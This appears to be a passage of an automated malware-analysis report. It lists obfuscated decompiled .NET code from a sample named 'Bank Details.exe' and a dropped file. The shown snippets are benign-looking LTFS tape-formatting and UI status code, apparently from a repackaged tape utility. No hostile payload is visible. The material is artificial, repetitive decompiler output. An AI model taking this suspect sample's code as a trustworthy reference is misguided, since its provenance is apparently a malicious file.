                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals1._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { CS_0024_003C_003E8__locals1._0024VB_0024Local_ex.ToString() }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Erase finished." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);Nj(Conversions.ToBoolean(NewLateBinding.LateGet(CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1]{new n8(c5S3Pa.p6G0Wk)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1]{new n8(i6Y3Mb.r9LWg6)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(ButtonDebugDumpMAM, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "RELEASE UNIT\r\n" }, (string[])null, (Type[])null);object textBox = TextBox8;object[] array = new object[1];object obj;object obj2 = (obj = TapeUtils);object[] array2 = new object[1];byte[] array3 = (byte[])(array2[0] = Rx98Sr);object[] array4 = array2;bool[] obj3 = new bool[1] { true };bool[] array5 = obj3;object obj4 = NewLateBinding.LateGet(obj2, (Type)null, "ParseSenseData", array2, (string[])null, (Type[])null, obj3);if (array5[0]){Rx98Sr = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array4[0]), typeof(byte[]));}array[0] = obj4;object[] array6 = array;bool[] array7;NewLateBinding.LateCall(textBox, (Type)null, "AppendText", array, (string[])null, (Type[])null, array7 = new bool[1] { true }, true);if (array7[0]){NewLateBinding.LateSetComplex(obj, (Type)null, "ParseSenseData", new object[2]{array3,array6[0]}, (string[])null, (Type[])null, true, true);}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "ALLOW MEDIA REMOVAL\r\n" }, (string[])null, (Type[])null);object textBox = TextBox8;object[] array = new object[1];object obj;object obj2 = (obj = TapeUtils);object[] array2 = new object[1];byte[] array3 = (byte[])(array2[0] = Ac36Xy);object[] array4 = array2;bool[] obj3 = new bool[1] { true };bool[] array5 = obj3;object obj4 = NewLateBinding.LateGet(obj2, (Type)null, "ParseSenseData", array2, (string[])null, (Type[])null, obj3);if (array5[0]){Ac36Xy = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array4[0]), typeof(byte[]));}array[0] = obj4;object[] array6 = array;bool[] array7;NewLateBinding.LateCall(textBox, (Type)null, "AppendText", array, (string[])null, (Type[])null, array7 = new bool[1] { true }, true);if (array7[0]){NewLateBinding.LateSetComplex(obj, (Type)null, "ParseSenseData", new object[2]{array3,array6[0]}, (string[])null, (Type[])null, true, true);}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(CS_0024_003C_003E8__locals0._0024VB_0024Local_result, "", false) == 0){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Local_CurDrive, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" loaded (unthread)"));}CS_0024_003C_003E8__locals0._0024VB_0024Local_result += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox2, (Type)null, "AppendText", array3 = new object[1] { CS_0024_003C_003E8__locals0._0024VB_0024Local_result }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox3, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);_0024VB_0024Me.Nj(Conversions.ToBoolean(NewLateBinding.LateGet(_0024VB_0024Me.CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox1, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(CS_0024_003C_003E8__locals0._0024VB_0024Local_result, "", false) == 0){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject((object)"TAPE", NewLateBinding.LateGet(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Local_CurDrive, (Type)null, "DevIndex", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)" unthreaded"));}CS_0024_003C_003E8__locals0._0024VB_0024Local_result += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox2, (Type)null, "AppendText", array3 = new object[1] { CS_0024_003C_003E8__locals0._0024VB_0024Local_result }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(_0024VB_0024Me.ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);_0024VB_0024Me.Nj(Conversions.ToBoolean(NewLateBinding.LateGet(_0024VB_0024Me.CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{if (Operators.CompareString(CS_0024_003C_003E8__locals0._0024VB_0024Local_result, "", false) == 0){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.ConfTapeDrive + " Barcode = " + CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Local_barcode;}CS_0024_003C_003E8__locals0._0024VB_0024Local_result += "\r\n";object[] array3;bool[] array4;NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox2, (Type)null, "AppendText", array3 = new object[1] { CS_0024_003C_003E8__locals0._0024VB_0024Local_result }, (string[])null, (Type[])null, array4 = new bool[1] { true }, true);if (array4[0]){CS_0024_003C_003E8__locals0._0024VB_0024Local_result = (string)Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array3[0]), typeof(string));}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(_0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);_0024VB_0024Me.Nj(Conversions.ToBoolean(NewLateBinding.LateGet(_0024VB_0024Me.CheckBox3, (Type)null, "Checked", new object[0], (string[])null, (Type[])null, (bool[])null)));}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1]{new n8(qb.s6T)}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{//IL_002e: Unknown result type (might be due to invalid IL or missing references)//IL_0034: Expected O, but got Unknown//IL_008c: Unknown result type (might be due to invalid IL or missing references)//IL_0093: Expected O, but got Unknown//IL_00f0: Unknown result type (might be due to invalid IL or missing references)//IL_00f7: Expected O, but got Unknown//IL_0157: Unknown result type (might be due to invalid IL or missing references)//IL_015e: Expected O, but got Unknownforeach (Control item in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.Panel1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val = item;val.Enabled = true;}foreach (Control item2 in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.Panel2, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val2 = item2;val2.Enabled = true;}foreach (Control item3 in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.TabControl1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val3 = item3;val3.Enabled = true;}foreach (Control item4 in (IEnumerable)NewLateBinding.LateGet(_0024VB_0024Me.TabPage1, (Type)null, "Controls", new object[0], (string[])null, (Type[])null, (bool[])null)){Control val4 = item4;val4.Enabled = true;}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(_0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { "Start format ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Initializing tape.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(CS_0024_003C_003E8__locals0._0024VB_0024Local_ModeData), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Vendor=OPEN.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Application name = LTFSCopyGUI.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Application Version={((ApplicationBase)p4.Application).Info.Version.ToString(3)}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: TextLabel= .." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Localization Identifier = 0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { $"WRITE ATTRIBUTE: Barcode={_0024VB_0024Local_barcode}.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "WRITE ATTRIBUTE: Format Version=2.4.0.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Block size.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Locate to data partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write VOL1Label.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfslabel.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write ltfsindex.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Write FileMark.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { "Locate to index partition.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: udo.exe.8.dr, y8.cs.Net Code: NewLateBinding.LateCall(_0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(_0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
